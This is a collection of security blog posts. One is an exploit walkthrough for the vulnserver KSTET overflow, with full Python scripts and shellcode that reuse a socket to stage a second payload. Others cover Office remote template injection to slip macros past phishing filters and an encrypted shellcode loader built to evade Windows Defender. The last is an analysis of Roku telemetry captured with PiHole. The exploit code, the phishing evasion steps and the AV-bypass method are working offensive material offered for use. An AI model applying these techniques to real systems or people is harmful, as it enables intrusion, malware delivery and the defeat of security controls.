BUFFER START ADDR = 0x003E4AD0
BUFFER LENGTH = 0x00001000 (4096 Bytes base 10)
FLAGS = 0x00000000

Again, at this point, we only care where that Socket Descriptor came from. If we set our breakpoint a few instructions above the CALL <JMP.&WS2_32.recv> we find that MOV EAX, DWORD PTR SS:[EBP-420] is responsible for pulling in the Socket Descriptor. Cool, let’s do some basic math:

EBP = 0x00B8FFB4 and if we calculate: (0x00B8FFB4 – 0x420) = 0x00B8FB94.
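The same subtraction can be double checked in a Python shell. Both operands are hexadecimal, which is easy to miss when reading the instruction operand [EBP-420] in the debugger. The variable names are my own.

```python
EBP = 0x00B8FFB4
SOCKET_OFFSET = 0x420                 # from MOV EAX, DWORD PTR SS:[EBP-420]

socket_slot = EBP - SOCKET_OFFSET
print(f"{socket_slot:08X}")           # 00B8FB94
```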

If we navigate to this address in the debugger, we should find our Socket Descriptor and, we do.

Confirming we have found the Socket Descriptor

Custom Shellcode

Now that we have the location of the Socket Descriptor, we can start to build our custom shellcode to set up the stack for our evil recv() function call. Since the stack grows toward lower addresses, we need to push the parameters in reverse order, adding the FLAGS parameter first and the Socket Descriptor last.

The easiest way to build your custom shellcode is simply to do it in the Debugger. Set a breakpoint at your JMP ESP, get to your JMP instruction and start building your shellcode. Below is an example of how I set up my Stack:

recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

Let’s go through this step by step:

Lines 2-3: I found that the stack was not aligned after the second payload was sent. This aligns the stack for our second payload
Lines 4-5: We XoR the EDX Register by itself to make it 0 (0x00000000) and PUSH it onto the stack. This will serve as our FLAG parameter.
Lines 6-8: We cannot have a null byte (0x00) in our shellcode so, we add 0x4 to EDX and shift it left by 1 Byte (8-bits) to give us 0x400. This serves as our Buffer Size.
Lines 9-12: Zero out EDX with XoR, MOV 0xB8F9FB90 into EDX, shift right to get rid of 0x90 and get our 0x00 for a final value of 0x00B8F9FB. This serves as our Buffer Start Address.
Lines 13-15: Load the Socket Descriptor address into ECX, then PUSH the value of the data located at ECX (denoted as [ECX], not ECX, note the difference). This serves as the Socket Descriptor.
Lines 16-18: Load the address of WS2_32.recv, that we found when we analyzed the legitimate recv(), into EDX and CALL EDX to complete the function call.
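The shift arithmetic in the steps above is easy to sanity check outside the debugger. The sketch below models 32-bit SHL/SHR on plain integers and confirms that the padded constants contain no null byte while the shifted results give the intended values. The helper names are illustrative, and the constants are the ones quoted in the step descriptions.

```python
MASK32 = 0xFFFFFFFF


def shl(value, bits):
    """32-bit logical shift left."""
    return (value << bits) & MASK32


def shr(value, bits):
    """32-bit logical shift right."""
    return (value & MASK32) >> bits


def has_null_byte(value):
    """True if any of the four bytes of a 32-bit value is 0x00."""
    return 0 in value.to_bytes(4, "little")


print(hex(shl(0x4, 8)))                 # 0x400      buffer size
print(hex(shr(0xB8F9FB90, 8)))          # 0xb8f9fb   buffer start address
print(hex(shr(0xB8FB9490, 8)))          # 0xb8fb94   address holding the socket descriptor
print(has_null_byte(0x00B8FB94), has_null_byte(0xB8FB9490))  # True False
```

Padding the low byte with 0x90 and shifting right by 8 is what lets a value with a leading 0x00 be loaded without a null byte appearing in the instruction bytes.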

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

# WS2_32.recv() Stack Setup
recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

buf = ""
buf += "KSTET /.:/"
buf += "\x90" * 2                       # NOPS
buf += recv                             # WS2_32.recv() function call
buf += "\x90" * (66 - (len(recv) + 2))  # NOPS 
buf += JMP_ESP                          # JMP ESP
buf += "\xEB\xB8"                       # JMP SHORT
buf += "C" * 500                        # FILLER
buf += "\r\n"

s.send(buf)

Exploitation

All we have to do is generate a second payload and send it right after our overflow payload. Since we have tricked vulnserver into running the recv() function, it will take our second send data and store it at the buffer address we specified. Let’s test this out with a payload of 0xCC (Int 3) so that the program will halt when it hits our shellcode.

Secondary payload made it to our memory location

Let’s add some basic shellcode to pop calc.exe and verify that our exploit works.

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

# WS2_32.recv() Stack Setup
recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

buf = ""
buf += "KSTET /.:/"
buf += "\x90" * 2                       # NOPS
buf += recv                             # WS2_32.recv() function call
buf += "\x90" * (66 - (len(recv) + 2))  # NOPS 
buf += JMP_ESP                          # JMP ESP
buf += "\xEB\xB8"                       # JMP SHORT
buf += "C" * 500                        # FILLER
buf += "\r\n"

s.send(buf)                             # Stage 1 Payload Send

# msfvenom -p windows/exec CMD=calc.exe -b '\x00' --var-name calc -f python
calc =  b""
calc += b"\xdb\xdc\xd9\x74\x24\xf4\x5f\xb8\x43\x2c\x57\x7b\x2b"
calc += b"\xc9\xb1\x31\x31\x47\x18\x83\xc7\x04\x03\x47\x57\xce"
calc += b"\xa2\x87\xbf\x8c\x4d\x78\x3f\xf1\xc4\x9d\x0e\x31\xb2"
calc += b"\xd6\x20\x81\xb0\xbb\xcc\x6a\x94\x2f\x47\x1e\x31\x5f"
calc += b"\xe0\x95\x67\x6e\xf1\x86\x54\xf1\x71\xd5\x88\xd1\x48"
calc += b"\x16\xdd\x10\x8d\x4b\x2c\x40\x46\x07\x83\x75\xe3\x5d"
calc += b"\x18\xfd\xbf\x70\x18\xe2\x77\x72\x09\xb5\x0c\x2d\x89"
calc += b"\x37\xc1\x45\x80\x2f\x06\x63\x5a\xdb\xfc\x1f\x5d\x0d"
calc += b"\xcd\xe0\xf2\x70\xe2\x12\x0a\xb4\xc4\xcc\x79\xcc\x37"
calc += b"\x70\x7a\x0b\x4a\xae\x0f\x88\xec\x25\xb7\x74\x0d\xe9"
calc += b"\x2e\xfe\x01\x46\x24\x58\x05\x59\xe9\xd2\x31\xd2\x0c"
calc += b"\x35\xb0\xa0\x2a\x91\x99\x73\x52\x80\x47\xd5\x6b\xd2"
calc += b"\x28\x8a\xc9\x98\xc4\xdf\x63\xc3\x82\x1e\xf1\x79\xe0"
calc += b"\x21\x09\x82\x54\x4a\x38\x09\x3b\x0d\xc5\xd8\x78\xe1"
calc += b"\x8f\x41\x28\x6a\x56\x10\x69\xf7\x69\xce\xad\x0e\xea"
calc += b"\xfb\x4d\xf5\xf2\x89\x48\xb1\xb4\x62\x20\xaa\x50\x85"
calc += b"\x97\xcb\x70\xe6\x76\x58\x18\xc7\x1d\xd8\xbb\x17"


payload = ""
payload += calc
payload += "\r\n"

s.send(payload)                           # Stage 2 Payload Send

Shellcode injection to pop calc.exe after exploit


Dynamic Office Template Injection

Sevro Security

Joshua

12 September 2019 at 23:00


You’ve sent your phishing email with a malicious Microsoft Office document. You poured your blood, sweat, and tears into that sexy Macro of yours. However, modern appliances can easily run that macro in a sandbox and determine if it’s evil or benign.

Sure, you could use common techniques to enumerate if you’re in a sandbox or not but, that requires more code and for the love of god, we’ve all written too much VBA as is. Or, you could encrypt the document and supply the password within the email/title but, some sandboxes have caught on to that as well or maybe the user is too lazy. Another option is to use Dynamic Office Template Injection.

Template Injection

There are some massive benefits to using template injection such as:

Ability to send a Docx and not a Docm
Macro does not “Live” within the Docx
Can “Hot Swap” payloads
Can remotely turn macros on and off

Template injection works via the following process (for the example moving forward, I will be using Microsoft Word):

Build your malicious macro into a .Dotm (Microsoft Template containing a Macro).
Host your .Dotm publicly via an S3 bucket, GCP Bucket, DO Space, etc.
Create a .Docx document with a Microsoft Template.
Unzip the .Docx and modify a single XML file
Zip contents back up and change .zip to .Docx

Create the Dotm Document

Here is the Macro that we will add to the .dotm document:

Sub AutoOpen()

    Dim Execute As Variant
    Execute = Shell("calc.exe", vbNormalFocus)

End Sub

In the example case, the Macro simply opens up calc.exe, as all good malware does in its infancy. Once we have the Macro working, we make sure to save the Word Document as a .dotm.

Create and test your macro — Calc.exe Macro

Create the Docx Document

When creating the .docx document, you need to select a real Microsoft Template. I like to use a resume template as they usually do not contain images or extremely fancy formatting.

Select an office template — Select a Template

Now that we have both documents created [example.dotm, resume.docx], let’s host example.dotm on a Digital Ocean space.

Host the macro enabled template — Host the example.dotm

Get the URI to example.dotm and move back to where we have the resume.docx. If you have 7-zip, winzip, etc., right click resume.docx and select Extract Here. If successful, you will be presented with a few new folders and a single xml file as seen below.

Unzip the .docx document — After resume.docx Unzipping

Navigate to word –> _rels and open settings.xml.rels in any text editor. We are going to replace the value of the Target attribute with our example.dotm URI.
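To check what a document's template relationship currently points at without unzipping it by hand, a read-only sketch like the one below can help. It assumes the standard Open Packaging Conventions layout (a `Relationship` element whose `Type` ends in `attachedTemplate`); the function name `attached_templates` is made up for this example and is not part of any tool used in this post.

```python
import zipfile
import xml.etree.ElementTree as ET

# XML namespace used by OPC relationship parts (.rels files).
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
RELS_PATH = "word/_rels/settings.xml.rels"


def attached_templates(docx):
    """Return (Target, TargetMode) pairs for attachedTemplate relationships.

    `docx` may be a filesystem path or a binary file-like object.
    """
    with zipfile.ZipFile(docx) as archive:
        if RELS_PATH not in archive.namelist():
            return []  # the document has no settings relationships part
        root = ET.fromstring(archive.read(RELS_PATH))
    found = []
    for rel in root.iter(RELS_NS + "Relationship"):
        if rel.get("Type", "").endswith("/attachedTemplate"):
            found.append((rel.get("Target"), rel.get("TargetMode")))
    return found


if __name__ == "__main__":
    # "resume.docx" is the example file name used in this post.
    for target, mode in attached_templates("resume.docx"):
        print(f"template target: {target} (mode: {mode})")
```

Running it before and after the edit should show the Target changing from the local template reference to the hosted URI.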

settings.xml.rels before the edit. — Before Replacement

settings.xml.rels after the edit. — After Replacement

Save settings.xml.rels and go back to the root directory of the original .docx. Select all the files/directories that were generated from the unzipping:

_rels
customXml
docProps
word
[Content_Types].xml

Add them all to a single .zip archive and then change the .zip suffix to a .docx suffix to complete the transformation.

Zip the contents of the docx back up — Data to be Zipped

the zip successfully completed. — After Zipping

Rename the .zip to .docx — Change .zip to .docx

The resulting resume.docx will now attempt to pull down the example.dotm template from our Digital Ocean Space each and every time it is opened. The fun part is, we can change the permissions on the example.dotm URI to be Public or Private.

Dynamic Macro Enabling/Disabling

What makes this interesting is the fact that we can change access to the example.dotm file hosted on Digital Ocean simply by making the URI Private or Public.

Resume.docx does not crash when it attempts to navigate to the non-existent example.dotm URI. It just doesn’t load a macro because there’s not one there. Simply put, it looks like any standard docx should.

When we change the example.dotm URI back to Public, and re-open resume.docx, we are presented with a macro enabled document since the URI is alive.

Disable Docx Macro:

By “disable” I simply mean change access to the URI where the .dotm document is located. If the .docx can’t find it, then there’s no macro.

Setting the remote office macro to private — Example.dotm Set to Private

Template Document disabled, no macro is loaded. — Docx Opens Normally

Enable Docx Macro:

Setting the example.dotm to Public and re-opening resume.docx will give us a macro enabled docx that opens calc.exe when we click Enable Content.

Host the Office template on a VPS — Example.dotm Set to Public

Docx loading a macro from office template. — We Get The “Enable Content” Warning

Word Macro Executing Calc.exe — Enabling Content Opens Calc.exe

Use Case

At the top of this post I outlined four (4) of the positives when using this technique. The most obvious one is bypassing email filtering by sending a truly benign docx. Yes, you risk a user opening the document without detonating your macro if they’re really motivated to open everything in their email immediately. But hell, send the phish, wait 5-7min, and arm the link.

It’s also worth noting that an attacker can easily change payloads. For example, if for some reason your initial C2 has been burned but the infection point is undetermined, you can swap out the example.dotm with one of your backup C2’s.

Bypass Windows Defender with A Simple Shell Loader

Sevro Security

Joshua

25 May 2019 at 05:25


One of the simplest ways to get past Windows Defender is to roll your own shellcode loader. There are hundreds of examples on GitHub, GitLab, and BitBucket, but this post is going to break it down and provide a simple framework that Red Teams and Penetration Testers alike can use.

This tutorial does not result in a final “tool”, although it will have complete and compilable code. I know, I know, C# is compiled to IL and then JIT-compiled at runtime rather than compiled straight to native code, but for the sake of brevity, I’m calling it compiled.

Resources

Before jumping right in, here is a list of resources that will help answer questions and concerns you may have while reading this post (AKA: I won’t define/detail every aspect of the exploit and only highlight important and kick-ass things):

Simple-Loader Repository – The code I developed and that is displayed below.
C++/C# VirtualAlloc Function
Sharpsploit.dll – DLL of common and useful C# exploitation methods including shellcode injection (Useful when looking for code).
Hiding Metasploit Shellcode by Rapid7 – I’m not using any of the methods from this post but, this has a good write-up on how Defender/AMSI works and why your shellcode is being popped by Defender.

Current State

Here’s my system and build information for reference.

Exploit Information:

Language: C#
- .NET Framework 4.0 (Cross compile to whatever you like)
- Visual Studio 17 (community)
Build Architecture: x86
Shell Code: MSFVenom windows/exec
- msfvenom -a x86 -p windows/exec cmd=calc.exe -f csharp

Victim Information:

Windows 10 Version 1809
- Fully Patched and Updated (5/24/2019)
- Defender Real-Time and Online protection Enabled
- Firewall Enabled

All of Defender’s services are turned on and updated

Testing

As of writing this (5/24/2019), the Windows Defender client Machine Learning system is able to easily detect stock Metasploit payloads. That’s not surprising. The question I asked myself was: to what extent do I need to go to build a standalone binary that will execute a payload without the binary being flagged as malicious?

When I say to what extent, I am talking about coding techniques and byte code obfuscation. For example, would simply Base64 encoding a byte[] object work for us? The short answer is, No.

Initial testing consisted of generating a simple calc.exe execution payload where the shell code (C# byte Array) would be loaded and executed in memory using VirtualAlloc().

After building the x86 Release exe, moving the exe to the desktop, and executing it, Defender flagged it as malicious and promptly removed the executable from the system.

Looking at Event 1116 from above, it looks like Defender is flagging on the known formatting of Metasploit. Defender is saying this is a Win32 Meterpreter payload which, it’s not. Microsoft doesn’t care as long as it catches a known Metasploit byte signature. The good news is we might just be able to encode or encrypt the payload to bypass Defender.

The Bypass

Video of the actual bypass — Metasploit Shell_Reverse_TCP Example

It’s helpful to understand what we are trying to defeat. We know, initially, we are trying to defeat the Windows Defender Client Side Machine Learning (Client ML) subsystem and most 3rd party EDR and AV products. Things we want to avoid are massive Base64 strings because of their large entropy values. This will be immediately flagged by most EDR/AV products.
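To put a number on the entropy point, here is a minimal sketch of a Shannon entropy measurement in bits per byte. It is only an illustration of the metric: how any particular AV/EDR product actually scores strings is not known here, and the sample inputs are made up. Note that Base64 text tops out at roughly 6 bits per character, so the signal is "high" relative to ordinary strings rather than in absolute terms.

```python
import base64
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of `data` in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


if __name__ == "__main__":
    prose = b"The quick brown fox jumps over the lazy dog. " * 20
    blob = base64.b64encode(os.urandom(4096))  # stand-in for a large encoded blob
    print(f"prose : {shannon_entropy(prose):.2f} bits/byte")
    print(f"base64: {shannon_entropy(blob):.2f} bits/byte")
```

A long Base64 string sits well above typical text on this scale, which is the kind of difference a scanner could key on.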

Other things we want to avoid are immediate shellcode execution for Windows Defender heuristic reasons. Defender and some EDR/AV products will be smart enough to remove sleep functions from your code so, depending on your Client/Target, this may or may not be an anti-forensics technique you utilize. My first thought was to have a Base64 decoding and AES256 decryption routine to get the payload ready for execution. This would also delay execution by a few hundred milliseconds.

It turns out, that’s all that was needed. I have an Encrypt() and Decrypt() function in my code that utilizes AES 256. A user can encrypt and encode their data with the Simple-Loader tool to get the final shellcode encrypted blob in Base64 encoding.

Simple-Loader.exe <path_to_metasploit_payload_txt>

Generate your payload — Encrypt Payload Example

GitHub Repository

The repository is a quick and dirty one as this is just a simple example. However, here is a breakdown on how to use it:

Open the Simple-Loader.sln in Visual Studio
Double click Program.cs
Go to Build –> Build Simple-Loader
- A new Binary will be located in simple-loader/bin/

Build the loader — Build Simple-Loader.exe for Encryption

Generate a payload with msfvenom and save to text file.
- msfvenom -p windows/exec cmd=calc.exe -f csharp -o payload.txt
Encrypt and Encode the payload with the Simple-Loader.exe binary.
- Simple-Loader.exe <path_to_payload>

Encrypt the payload — Generate and Encrypt Payload

Take the output from Simple-Loader and replace the String hiphop with your new payload.

Add the encrypted payload — Change hiphop String

Re-Build the binary and you’re good to go!

Hopefully this helps shed some light on the simplicity of bypassing Windows Defender on a fully patched system!

Cheers!


Roku & PiHole – A Deep Dive

Sevro Security

Joshua

7 December 2018 at 17:11


Update 1: (12/16/2018) – GitHub Repository Made Public Here.

Update 2: (12/16/2018) – Added a new analysis as /u/Anchor-shark within the /r/pihole subreddit mentioned I should take a look at a Roku that does not have the logging servers blocked. I have done just that.

This is a work in progress. It’s not perfect but it’s just starting to get cool and I’m digging deeper! I think this is going to be the first post in a series. I say that because I need to get my hands on some older hardware and there are some other gears moving as well. Anyhow, here’s the post.

A while back (years ago), I added a PiHole to my network. The thing is a damn workhorse! If you don’t know what PiHole is, well, you’re wrong and you should! Long story short, it’s a network-wide ad blocker with a ton of features. But most importantly, it has lots of color and looks pretty.

Anyhow, I was recently looking over the data on my PiHole and noticed a serious amount of traffic coming from my Roku’s. Before I start getting into the specifics, let me first describe the systems on my network.

I own 3 different Roku’s. All of which are 1-2 years old which is important for a few different reasons.

They’re all running Roku OS v8+
Old features such as TCPdump are now unavailable.
Secret menus contain less functionality.

The Roku’s are all on a 192.168.1.x/24 network. This isn’t massively important but, it’s worth noting.

Roku Traffic Analysis

PiHole was showing that a large majority of all the traffic on my home LAN was coming from my three Roku devices. This isn’t too surprising since they’re streaming devices and at any given time one or two of them are active (wife, kids, etc.).

I still decided to investigate and take a deeper look into the data to see what the Roku’s were actually doing. First, let’s just take a look at the data within the PiHole Web UI.

The traffic displayed in the images above consists of DNS queries that have been blocked, and these queries have nothing to do with my streaming services (i.e., Netflix, Amazon, etc.). Still, those are only the blocked domains, so a deeper look was necessary.

The next logical thing to do is to pull the logs from the server and start to parse them. The problem is PiHole rotates the logs every 5 days. So before you can jump right in, you need to change the logrotate configuration. I changed mine to rotate every 100 days. Full disclosure, the data that I will present here is from a 14 day analysis. I don’t expect a massive difference but, I thought I would put it out there.

I waited 24 days, pulled the logs, and wrote some python to strip the logs for the data I wanted. My initial criteria to narrow the logs down to a manageable size was:

Only log entries with the DNS request coming from the Roku IP’s.
Only the Date, IP, URI attributes shall be parsed.

The logs themselves are not in the best form so, first things first, translate the data I want to a CSV and store to disk for later parsing. Also, this makes it SOO much easier to ingest the data into a pandas dataframe for analysis.
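As a rough idea of what that log-to-CSV step can look like, here is a minimal sketch. It is not the script from the repository: it assumes the usual dnsmasq query-line layout that PiHole writes, the function names are made up for this example, and `example.logs.roku.com` in the comment is a placeholder hostname.

```python
import csv
import re

# Assumed dnsmasq query-line layout, e.g.
# "Dec  7 17:11:01 dnsmasq[512]: query[A] example.logs.roku.com from 192.168.1.58"
QUERY_RE = re.compile(
    r"^(?P<date>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) dnsmasq\[\d+\]: "
    r"query\[[^\]]+\] (?P<uri>\S+) from (?P<ip>\S+)$"
)

# The three Roku addresses listed in this post.
ROKU_IPS = {"192.168.1.58", "192.168.1.99", "192.168.1.209"}


def roku_rows(lines, ips=ROKU_IPS):
    """Yield (date, ip, uri) for every query line sent by one of `ips`."""
    for line in lines:
        match = QUERY_RE.match(line.strip())
        if match and match["ip"] in ips:
            yield match["date"], match["ip"], match["uri"]


def write_csv(rows, out):
    """Write the parsed rows to an open text file object, with a header row."""
    writer = csv.writer(out)
    writer.writerow(["date", "ip", "uri"])
    writer.writerows(rows)
```

The resulting file can then be loaded with `pandas.read_csv()` for the dataframe work described here.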

Once the logs are in CSV and in a dataframe object, we can then parse out the following:

Log entries that have a Roku logging server listed as the URI.
Log entries for logging servers on a per IP basis for individual analysis.

This left me with several csv’s:

all_logs.csv – Contains all logs parsed from the 14 log files from the Roku IP’s.
roku_logs.csv – All log entries that are *.logs.roku.com
<ip>.csv – Three logs segregated by IP subject to the roku_logs.csv

My main goal with this initial analysis is to determine how much traffic compared to all traffic do the Roku’s generate on my network and how much of that traffic was Roku logging traffic (i.e., not streaming traffic). The last thing is a differential time analysis. That is, how often are the Roku’s beaconing out to the logging servers.

Analysis Results

When you initially look at the logs, it seems that most of the Roku’s beacon out every 30 seconds to their logging servers. Sometimes, well most times, it’s multiple beacons every 30 seconds to different servers. Here’s an example:

24 Days of aggregated data

Roku overall traffic made up 34% of all traffic on my LAN
Roku direct logging traffic made up 14% of all traffic on my LAN
192.168.1.58:
- Total Number of Logging Records: 115,594
- Beacons on average every 18.69 seconds over 24 days
192.168.1.99:
- Total Number of Logging Records: 129,408
- Beacons on average every 16.69 seconds over 24 days
192.168.1.209:
- Total Number of Logging Records: 149,977
- Beacons on average every 14.40 seconds over 24 days

So what does this mean? Well, it means that on average, a Roku is logging information about you and your family about 380 times per hour (2-4 DNS requests per 30-40 sec) and 8,800 times per day, give or take a few hundred.

Okay Okay but, what are they logging? Well, I started to attack this problem and the first logical step is to look at the Roku’s privacy policy. So, let’s take a look.

Update 1: Roku Logging Allowed

Since this project came from my PiHole logs, I thought I would get some constructive criticism from the /r/pihole subreddit. You can view the thread here. One of the redditors made a really good point that basically stated that the Roku’s are effectively freaking out because their DNS requests are getting blocked. As such, the frequency is subject to the blocking and not the true nature of an active Roku whose DNS requests are not getting blocked.

This is a really good point as this very well might be the case. So, for the last 4 days, I have allowed all Roku logging traffic on my LAN. The PiHole logs still capture the DNS requests and therefore, the logs still maintain a valid record of unblocked requests.

Before we look at the data, I want to be as transparent as possible. I have made some adjustments to my timing function. Whereas I was originally looking at only unique timestamps per IP and then obtaining the time differential of the datetime objects via pairs, I am now simply taking the total number of seconds and dividing it by the number of records (DNS requests), which gives the average number of seconds per request. The total number of seconds is the difference between the last record in the DELTA_DATES array (i.e., DELTA_DATES[len(DELTA_DATES)-1]), which is a DateTime object, and the most recent date (i.e., DELTA_DATES[0]). I felt that this is not only much simpler but also more representative, as I am no longer just measuring unique records. I have edited the initial results to reflect the new changes.
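A minimal sketch of that timing calculation is below. It assumes the reported figure is seconds per request (total seconds divided by record count, which is what the "every N seconds" numbers imply) and that the list is ordered newest first, as DELTA_DATES is described. The function name is made up for this example.

```python
from datetime import datetime, timedelta


def average_beacon_interval(delta_dates):
    """Average seconds per DNS request over the window covered by `delta_dates`.

    `delta_dates` mirrors the DELTA_DATES list described in the post: datetime
    objects for one IP, most recent record at index 0, oldest record last.
    """
    if len(delta_dates) < 2:
        raise ValueError("need at least two records to measure an interval")
    # abs() keeps the result positive regardless of the list ordering.
    span = abs(delta_dates[0] - delta_dates[-1]).total_seconds()
    return span / len(delta_dates)


if __name__ == "__main__":
    newest = datetime(2018, 12, 16, 12, 0, 0)
    # Made-up data: one record every 20 seconds for an hour, newest first.
    records = [newest - timedelta(seconds=20 * i) for i in range(181)]
    print(f"{average_beacon_interval(records):.2f} seconds per request")
```

Because every record counts, several requests sharing one timestamp pull the average down, which is the "no longer just measuring unique records" effect.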

The Data

For the last 4 days, here is the information:

Roku Overall Traffic Made up 47% of all traffic on my LAN.
Roku Direct Logging Traffic made up 9% of all traffic on my LAN
192.168.1.58:
- Total Number of Logging Records: 17,694
- Average Beaconing Time Interval: 18.19s
192.168.1.99:
- Total Number of Logging Records: 3,541
- Average Beaconing Time Interval: 90.72s
192.168.1.209:
- Total Number of Logging Records: 6,439
- Average Beaconing Time Interval: 49.87s

This is very interesting to me. The Roku that gets the most use by far is the living room (192.168.1.58) because it’s connected to our large 4K TV and is at the center of everything in our home. This guy is in use pretty much all day when we are at home (i.e., Music, Netflix, Sling, etc.). So it would seem that the more the system is being used, the more it is going to beacon out. It’s also worth noting that the other two Roku’s are not used as much. Especially the basement system as that’s really only used during parties.

If we look specifically at the Living Room Roku and break down all traffic over the 4 days by hour, we can easily see that the logging spikes right away in the mornings (breakfast, news) and gradually goes up and down over midday and night, suggesting that Roku logs a ton more (every 18.19 seconds) if that system is in use.
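The by-hour breakdown can be approximated with a simple counter over the record timestamps. This is a sketch under the assumption that each log record has already been parsed into a `datetime`; the function name is made up for this example.

```python
from collections import Counter
from datetime import datetime


def requests_per_hour(timestamps):
    """Count records per hour of day (0-23), summed across all days."""
    counts = Counter(ts.hour for ts in timestamps)
    return [counts.get(hour, 0) for hour in range(24)]


if __name__ == "__main__":
    # Made-up sample: two morning records and one late-evening record.
    sample = [
        datetime(2018, 12, 14, 7, 5, 0),
        datetime(2018, 12, 15, 7, 45, 30),
        datetime(2018, 12, 15, 22, 10, 0),
    ]
    for hour, count in enumerate(requests_per_hour(sample)):
        if count:
            print(f"{hour:02d}:00  {count}")
```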

The data seems to support Reddit’s point that Roku’s will phone home more if they’re being blocked, however if you are using those Roku’s frequently, it’s a moot point as it seems they log just as much if not more.

Let’s put my assertion to the test. The Living Room analysis above supports my assumption so, if we look at the Master Bedroom, where the Roku gets used before going to bed, we should see a spike around that time. And we do.

I think the big takeaways are:

System log activity is directly correlated to use. This is probably obvious to everyone.
Mild/Medium use of a Roku system generates just as much traffic as blocking DNS requests coming from Roku. We see a minor change in overall traffic from the Living Room host when we allowed all logging (0.5% difference).
For systems not in regular use, the interval between logging beacons grows by 50-70 seconds if traffic is allowed, supporting Reddit’s point that blocking the traffic causes more of it. Again, if you use a system frequently, it will generate just as much traffic as it would if you were to block the DNS requests.

What’s Roku Logging?

I’ll list a few of the things but first, here is the Roku Privacy Policy.

Name
Email Address
Postal Address
Phone Number
Birth Date
Demographic
Social Media Accounts
- OAuth login information
Shipping Information
Purchase information
- Web Cookies
- Roku App Purchases
- Gift purchases
Credit Card Information
Personal Information on friends/connections:
- email
- address
- gifts
IP address
Operating System type
Operating System Version
WiFi network name
WiFi networking connection metrics
Web Cookie Data

The list goes on and on and on. But reading a privacy policy just isn’t sexy. So, I’ve pulled a few PCAP’s from my router which, didn’t amount to much other than mapping the AWS buckets.

My next attempt to pull data from the logging PCAP’s was to DNS and ARP cache poison one of the Roku’s while running an HTTPS proxy and a self-signed certificate. This just ended up in a CA authenticity failure which, was to be expected. Maybe SSLStrip could work? Not sure yet but, this might not be the right path.

Future Research

Here is what I am currently working on in attempts to get more information all together.

Roku’s used to have a TCPDump utility when you enabled developer mode. All of my devices have been connected and have auto-update on. There’s also no way to revert the box to an older OS. However, I think I have a good lead on a system that has not been connected for a few years and might be interesting.

Roku’s developer API and Brightscript:

Roku uses their own programming language called brightscript. The API is pretty well documented and it’s very simple to enable developer mode via secret menus and start pulling XML information from the system. The issue is there is no direct contact to the underlying OS (Which is Linux) with the exception of a telnet shell with access to the free command. And trust me, I’ve tried all sorts of command injection with that!

